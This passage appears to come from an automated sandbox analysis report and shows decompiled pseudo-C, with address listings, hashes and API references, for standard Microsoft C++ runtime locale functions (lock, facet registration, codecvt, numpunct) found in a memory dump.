std::_Lockit::~_Lockit.LIBCPMT ref: 6D45DC05
__Getcoll.LIBCPMT ref: 6D45DCC5
std::_Facet_Register.LIBCPMT ref: 6D45DD44
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45DD76

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: 21cf1d3111d6a4a11d075e7d0815244c3f14faf65a134d0b90c487428ebd8725
Instruction ID: 0d12c34ef1351b0ca40a7f36d7b2a6d4fa9612865544c6a986b801ba202770c0
Opcode Fuzzy Hash: 21cf1d3111d6a4a11d075e7d0815244c3f14faf65a134d0b90c487428ebd8725
Instruction Fuzzy Hash: FB61A6B1904248DFDB12CF98C984FAEBBB4EF86314F228159D415AB280C775AE14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D45A9E0, Relevance: 9.1, APIs: 6, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D45A9E0(void* __ebx, void* __edx, void* __fp0, void* _a4) {
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr* _v28;
				char _v32;
				char _v48;
				char _v100;
				void* __edi;
				void* __esi;
				signed int _t49;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr* _t68;
				void* _t70;
				signed int _t75;
				signed int _t76;
				void* _t77;
				intOrPtr _t80;
				intOrPtr _t84;
				void* _t90;
				signed int _t92;
				intOrPtr* _t96;
				signed int _t98;
				void* _t105;
				void* _t113;

				_t113 = __fp0;
				_t90 = __edx;
				_t77 = __ebx;
				_push(0xffffffff);
				_push(E6D4FB998);
				_push( *[fs:0x0]);
				_t49 =  *0x6d534074; // 0x286e79ba
				_push(_t49 ^ _t98);
				 *[fs:0x0] =  &_v16;
				_v20 = 0;
				E6D476A10( &_v32, 0);
				_v8 = 0;
				_t92 =  *0x6d53fb58; // 0x1
				_v28 =  *0x6d55a9e0;
				if(_t92 == 0) {
					E6D476A10( &_v24, _t92);
					_v8 = 1;
					_t105 =  *0x6d53fb58 - _t92; // 0x1
					if(_t105 == 0) {
						_t75 =  *0x6d53fb40; // 0x2
						_t76 = _t75 + 1;
						 *0x6d53fb40 = _t76;
						 *0x6d53fb58 = _t76;
					}
					_v8 = 0;
					E6D476A77( &_v24);
					_t92 =  *0x6d53fb58; // 0x1
				}
				_t80 =  *((intOrPtr*)(_a4 + 4));
				if(_t92 >=  *((intOrPtr*)(_t80 + 0xc))) {
					_t96 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t80 + 0x14)) == 0) {
						L11:
						if(_t96 != 0) {
							L21:
							_v8 = 0xffffffff;
							E6D476A77( &_v32);
							 *[fs:0x0] = _v16;
							return _t96;
						}
						L12:
						_t56 = _v28;
						if(_t56 == 0) {
							_push(0x18);
							_t96 = E6D4906EF(_t80, _t90, _t96, __eflags);
							_v28 = _t96;
							_v8 = 2;
							_t84 =  *((intOrPtr*)(_a4 + 4));
							__eflags = _t84;
							if(_t84 != 0) {
								_t59 =  *((intOrPtr*)(_t84 + 0x18));
								__eflags = _t59;
								if(_t59 == 0) {
									_t59 = _t84 + 0x1c;
								}
							} else {
								_t59 = 0x6d50f4bd;
							}
							L6D4519A0(_t77,  &_v100, _t90, _t92, _t113, _t59);
							_v8 = 3;
							_v20 = 1;
							 *_t96 = 0x6d500310;
							_v8 = 4;
							_t32 = _t96 + 4; // 0x4
							 *_t96 = 0x6d500320;
							 *_t32 = 0;
							_v8 = 5;
							 *_t96 = 0x6d50034c;
							_v8 = 6;
							 *_t96 = 0x6d50035c;
							E6D47A48E( &_v100, _t32, __eflags,  &_v48);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							_v8 = 0;
							_v20 = 1;
							_v20 = 0;
							E6D451A70();
							_a4 = _t96;
							_v8 = 8;
							E6D478A0B(__eflags, _t96);
							_t68 =  *((intOrPtr*)( *_t96 + 4));
							__eflags = _t68 - 0x6d451d80;
							if(_t68 != 0x6d451d80) {
								 *_t68();
							} else {
								asm("lock inc dword [edi]");
							}
							 *0x6d55a9e0 = _t96;
							_a4 = 0;
							_v8 = 0;
						} else {
							_t96 = _t56;
						}
						goto L21;
					}
					_t70 = E6D478A37();
					if(_t92 >=  *((intOrPtr*)(_t70 + 0xc))) {
						goto L12;
					}
					_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t70 + 8)) + _t92 * 4));
					goto L11;
				}
				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t80 + 8)) + _t92 * 4));
				if(_t96 != 0) {
					goto L21;
				}
				goto L8;
			}

0x6d45a9e0
0x6d45a9e0
0x6d45a9e0
0x6d45a9e3
0x6d45a9e5
0x6d45a9f0
0x6d45a9f6
0x6d45a9fd
0x6d45aa01
0x6d45aa0c
0x6d45aa13
0x6d45aa18
0x6d45aa1f
0x6d45aa2a
0x6d45aa2f
0x6d45aa35
0x6d45aa3a
0x6d45aa3e
0x6d45aa44
0x6d45aa46
0x6d45aa4b
0x6d45aa4c
0x6d45aa51
0x6d45aa51
0x6d45aa56
0x6d45aa5d
0x6d45aa62
0x6d45aa62
0x6d45aa6b
0x6d45aa71
0x6d45aa83
0x6d45aa83
0x6d45aa85
0x6d45aa89
0x6d45aa9b
0x6d45aa9d
0x6d45ab89
0x6d45ab89
0x6d45ab93
0x6d45ab9d
0x6d45abaa
0x6d45abaa
0x6d45aaa3
0x6d45aaa3
0x6d45aaa8
0x6d45aab1
0x6d45aab8
0x6d45aabd
0x6d45aac0
0x6d45aac7
0x6d45aaca
0x6d45aacc
0x6d45aad5
0x6d45aad8
0x6d45aada
0x6d45aadc
0x6d45aadc
0x6d45aace
0x6d45aace
0x6d45aace
0x6d45aae3
0x6d45aae8
0x6d45aaec
0x6d45aaf3
0x6d45aaf9
0x6d45ab00
0x6d45ab03
0x6d45ab09
0x6d45ab0f
0x6d45ab16
0x6d45ab1c
0x6d45ab27
0x6d45ab2d
0x6d45ab35
0x6d45ab38
0x6d45ab3c
0x6d45ab48
0x6d45ab51
0x6d45ab54
0x6d45ab59
0x6d45ab5c
0x6d45ab61
0x6d45ab6b
0x6d45ab6e
0x6d45ab73
0x6d45abad
0x6d45ab75
0x6d45ab75
0x6d45ab75
0x6d45ab78
0x6d45ab7e
0x6d45ab85
0x6d45aaaa
0x6d45aaaa
0x6d45aaaa
0x00000000
0x6d45aaa8
0x6d45aa8b
0x6d45aa93
0x00000000
0x00000000
0x6d45aa98
0x00000000
0x6d45aa98
0x6d45aa76
0x6d45aa7b
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45AA13
std::_Lockit::_Lockit.LIBCPMT ref: 6D45AA35
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45AA5D
__Getctype.LIBCPMT ref: 6D45AB2D
std::_Facet_Register.LIBCPMT ref: 6D45AB61
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45AB93

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 587cb0808d311e090b062e4a19c8d672f81444f6dcbfdce1c3406cb23c606ebf
Instruction ID: 7af32be0297f69a585692e2ab9e82e2eb53fd5f9903747377543ba5bbaba6e88
Opcode Fuzzy Hash: 587cb0808d311e090b062e4a19c8d672f81444f6dcbfdce1c3406cb23c606ebf
Instruction Fuzzy Hash: 7E51DAB090424ADFCB21CF58C541F9EBBB4AF05354F22815DD945AB380E775AE04CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D47911C, Relevance: 9.1, APIs: 6, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6D47911C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				void* _t30;
				intOrPtr* _t44;
				void* _t53;
				intOrPtr* _t54;
				void* _t65;

				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10( &_v20, 0);
				_t53 =  *0x6d53fc30; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t53;
				_t20 = E6D451D10();
				_t40 = _a8;
				_t21 = E6D452140(_a8, _t20);
				_t51 = _t21;
				if(_t21 != 0) {
					L5:
					E6D476A77( &_v20);
					return E6D490E67(_t51);
				} else {
					if(_t53 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D479574(__ebx, _t40, __edx, _t51, _t53, __eflags, _t65) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6D451940();
							E6D4924F4( &_v32, 0x6d5329cc);
							asm("int3");
							_push(_t44);
							_push(_t53);
							_t54 = _t44;
							_v12 = _t54;
							_t30 = E6D479262(__ebx, _t44, __edx, _t51, _t54, __eflags);
							 *_t54 = 0x6d500b00;
							E6D4795FA(_t30, _t54, _v0, 0);
							return _t54;
						} else {
							_t51 = _v16;
							_v16 = _t51;
							_v4 = 1;
							E6D478A0B(__eflags, _t51);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t51 + 4))))();
							 *0x6d53fc30 = _t51;
							goto L5;
						}
					} else {
						_t51 = _t53;
						goto L5;
					}
				}
			}

0x6d47911c
0x6d479123
0x6d47912d
0x6d479132
0x6d47913d
0x6d479141
0x6d479144
0x6d479149
0x6d47914d
0x6d479152
0x6d479156
0x6d47919b
0x6d47919e
0x6d4791aa
0x6d479158
0x6d47915a
0x6d479160
0x6d479166
0x6d47916e
0x6d479171
0x6d4791ab
0x6d4791ae
0x6d4791bc
0x6d4791c1
0x6d4791c5
0x6d4791c6
0x6d4791c7
0x6d4791c9
0x6d4791cc
0x6d4791d8
0x6d4791de
0x6d4791e7
0x6d479173
0x6d479173
0x6d479176
0x6d47917a
0x6d47917e
0x6d47918b
0x6d479193
0x6d479195
0x00000000
0x6d479195
0x6d47915c
0x6d47915c
0x00000000
0x6d47915c
0x6d47915a

APIs

__EH_prolog3.LIBCMT ref: 6D479123
std::_Lockit::_Lockit.LIBCPMT ref: 6D47912D

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

codecvt.LIBCPMT ref: 6D479167
std::_Facet_Register.LIBCPMT ref: 6D47917E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47919E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4791BC

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 959b0c03b06f3ec1ae2a125c7be5d1490ac2fe884cd13cd9fc1376881c412b73
Instruction ID: 645d249a41a9631d72cb5606b3d4857c1438540ce97310e87ab6846c44051db3
Opcode Fuzzy Hash: 959b0c03b06f3ec1ae2a125c7be5d1490ac2fe884cd13cd9fc1376881c412b73
Instruction Fuzzy Hash: D021C3729082299BCF14DF95C854EEE7779AF85764F22040DE601AB390DF759E01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47727A, Relevance: 9.1, APIs: 6, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6D47727A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				void* _t30;
				intOrPtr* _t44;
				void* _t53;
				intOrPtr* _t54;

				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10( &_v20, 0);
				_t53 =  *0x6d53fb3c; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t53;
				_t20 = E6D451D10();
				_t40 = _a8;
				_t21 = E6D452140(_a8, _t20);
				_t51 = _t21;
				if(_t21 != 0) {
					L5:
					E6D476A77( &_v20);
					return E6D490E67(_t51);
				} else {
					if(_t53 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D4778B4(__ebx, _t40, __edx, _t51, _t53, __eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6D451940();
							E6D4924F4( &_v32, 0x6d5329cc);
							asm("int3");
							_push(_t44);
							_push(_t53);
							_t54 = _t44;
							_v12 = _t54;
							_t30 = E6D4773C0(__ebx, _t44, __edx, _t51, _t54, __eflags);
							 *_t54 = 0x6d5003fc;
							E6D47794C(_t30, _t54, _v0, 0);
							return _t54;
						} else {
							_t51 = _v16;
							_v16 = _t51;
							_v4 = 1;
							E6D478A0B(__eflags, _t51);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t51 + 4))))();
							 *0x6d53fb3c = _t51;
							goto L5;
						}
					} else {
						_t51 = _t53;
						goto L5;
					}
				}
			}

0x6d47727a
0x6d477281
0x6d47728b
0x6d477290
0x6d47729b
0x6d47729f
0x6d4772a2
0x6d4772a7
0x6d4772ab
0x6d4772b0
0x6d4772b4
0x6d4772f9
0x6d4772fc
0x6d477308
0x6d4772b6
0x6d4772b8
0x6d4772be
0x6d4772c4
0x6d4772cc
0x6d4772cf
0x6d477309
0x6d47730c
0x6d47731a
0x6d47731f
0x6d477323
0x6d477324
0x6d477325
0x6d477327
0x6d47732a
0x6d477336
0x6d47733c
0x6d477345
0x6d4772d1
0x6d4772d1
0x6d4772d4
0x6d4772d8
0x6d4772dc
0x6d4772e9
0x6d4772f1
0x6d4772f3
0x00000000
0x6d4772f3
0x6d4772ba
0x6d4772ba
0x00000000
0x6d4772ba
0x6d4772b8

APIs

__EH_prolog3.LIBCMT ref: 6D477281
std::_Lockit::_Lockit.LIBCPMT ref: 6D47728B

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

codecvt.LIBCPMT ref: 6D4772C5
std::_Facet_Register.LIBCPMT ref: 6D4772DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4772FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47731A

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 0169c2bedf6633ca8df7a1dd2b16e841094de68d5ab78bc242d3b4775c53f800
Instruction ID: 0bd3d47f7ed6ddeda4de81d8ae610c9b0d9d70409925519696c9f92bf887b630
Opcode Fuzzy Hash: 0169c2bedf6633ca8df7a1dd2b16e841094de68d5ab78bc242d3b4775c53f800
Instruction Fuzzy Hash: FE21CFB1D082299BCF14DB95C850EEE77B5AF44214F22000EEA10AB390DF709E01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BB3E, Relevance: 9.1, APIs: 6, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D47BB3E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v36;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;
				void* _t62;

				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10( &_v20, 0);
				_t52 =  *0x6d53fd70; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6D451D10();
				_t40 = _a8;
				_t22 = E6D452140(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6D476A77( &_v20);
					return E6D490E67(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D47C19A(__ebx, _t40, __edx, _t50, _t52, __eflags, _t62) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v36;
							E6D451940();
							E6D4924F4( &_v36, 0x6d5329cc);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _v4;
							_v20 = _t44;
							 *_t44 = 0x6d5019fc;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6D478A0B(__eflags, _t50);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6d53fd70 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

0x6d47bb3e
0x6d47bb45
0x6d47bb4f
0x6d47bb54
0x6d47bb5f
0x6d47bb63
0x6d47bb66
0x6d47bb6b
0x6d47bb6f
0x6d47bb74
0x6d47bb78
0x6d47bbbd
0x6d47bbc0
0x6d47bbcc
0x6d47bb7a
0x6d47bb7c
0x6d47bb82
0x6d47bb88
0x6d47bb90
0x6d47bb93
0x6d47bbcd
0x6d47bbd0
0x6d47bbde
0x6d47bbe3
0x6d47bbe7
0x6d47bbeb
0x6d47bbf0
0x6d47bbf3
0x6d47bbfa
0x6d47bb95
0x6d47bb95
0x6d47bb98
0x6d47bb9c
0x6d47bba0
0x6d47bbad
0x6d47bbb5
0x6d47bbb7
0x00000000
0x6d47bbb7
0x6d47bb7e
0x6d47bb7e
0x00000000
0x6d47bb7e
0x6d47bb7c

APIs

__EH_prolog3.LIBCMT ref: 6D47BB45
std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

numpunct.LIBCPMT ref: 6D47BB89
std::_Facet_Register.LIBCPMT ref: 6D47BBA0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BBDE

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: ab4cf9ff48e6282d1c01c90541746608a381f701f0e7bae2793e0eccc13de056
Instruction ID: 8a6d1a5ecbb88621c7914215708fd4d5eb66293510f8b4186be49610b3d9ba94
Opcode Fuzzy Hash: ab4cf9ff48e6282d1c01c90541746608a381f701f0e7bae2793e0eccc13de056
Instruction Fuzzy Hash: 4D11CA319042199BCF18CF64D844EEE7BB4BF85328F22441DEA14AB390DB74DE058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CD84, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D48CD84(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;
				void* _t202;

				_t182 = __edx;
				_t141 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t198 - 0x14, 0);
				_t189 =  *0x6d53fe48; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6D451D10();
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6D476A77(_t198 - 0x14);
					return E6D490E67(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6D48D3B5(__ebx, _t144, __edx, _t184, _t189, __eflags, _t202) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t198 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t184, _t189);
							E6D476A10(_t198 - 0x14, 0);
							_t190 =  *0x6d53fe44; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6D451D10();
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6D476A77(_t198 - 0x14);
								return E6D490E67(_t185);
							} else {
								__eflags = _t190;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6D48D439(_t141, _t151, __edx, _t185, _t190, __eflags, _t202) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t198 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t141, _t185, _t190);
										E6D476A10(_t198 - 0x14, 0);
										_t191 =  *0x6d53fe4c; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6D451D10();
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6D476A77(_t198 - 0x14);
											return E6D490E67(_t186);
										} else {
											__eflags = _t191;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6D48D4BE(_t141, _t158, __edx, _t186, _t191, __eflags, _t202) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t198 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t141, _t186, _t191);
													E6D476A10(_t198 - 0x14, 0);
													_t192 =  *0x6d53fe50; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6D451D10();
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6D452140( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6D476A77(_t198 - 0x14);
														return E6D490E67(_t187);
													} else {
														__eflags = _t192;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6D48D52A(_t141, _t165, _t182, _t187, _t192, __eflags, _t202) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t198 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(4);
																E6D490E9E(0x6d4fefbc, _t141, _t187, _t192);
																_t193 = _t198 - 0x20;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_push( *((intOrPtr*)(_t198 + 8)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6d5044f4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6D48E2BD(_t141, _t198 - 0x20, _t182, _t187, _t193,  *_t63, _t202);
																return E6D490E67(_t193);
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6D478A0B(__eflags, _t187);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6d53fe50 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6D478A0B(__eflags, _t186);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6d53fe4c = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6D478A0B(__eflags, _t185);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6d53fe44 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6D478A0B(__eflags, _t184);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6d53fe48 = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6d48cd84
0x6d48cd84
0x6d48cd84
0x6d48cd8b
0x6d48cd95
0x6d48cd9a
0x6d48cda5
0x6d48cda9
0x6d48cdac
0x6d48cdb1
0x6d48cdb5
0x6d48cdba
0x6d48cdbe
0x6d48ce03
0x6d48ce06
0x6d48ce12
0x6d48cdc0
0x6d48cdc2
0x6d48cdc8
0x6d48cdce
0x6d48cdd6
0x6d48cdd9
0x6d48ce16
0x6d48ce24
0x6d48ce29
0x6d48ce2a
0x6d48ce31
0x6d48ce3b
0x6d48ce40
0x6d48ce4b
0x6d48ce4f
0x6d48ce52
0x6d48ce57
0x6d48ce60
0x6d48ce62
0x6d48ce64
0x6d48cea9
0x6d48ceac
0x6d48ceb8
0x6d48ce66
0x6d48ce66
0x6d48ce68
0x6d48ce6e
0x6d48ce74
0x6d48ce7c
0x6d48ce7f
0x6d48cebc
0x6d48ceca
0x6d48cecf
0x6d48ced0
0x6d48ced7
0x6d48cee1
0x6d48cee6
0x6d48cef1
0x6d48cef5
0x6d48cef8
0x6d48cefd
0x6d48cf06
0x6d48cf08
0x6d48cf0a
0x6d48cf4f
0x6d48cf52
0x6d48cf5e
0x6d48cf0c
0x6d48cf0c
0x6d48cf0e
0x6d48cf14
0x6d48cf1a
0x6d48cf22
0x6d48cf25
0x6d48cf62
0x6d48cf70
0x6d48cf75
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfac
0x6d48cfae
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
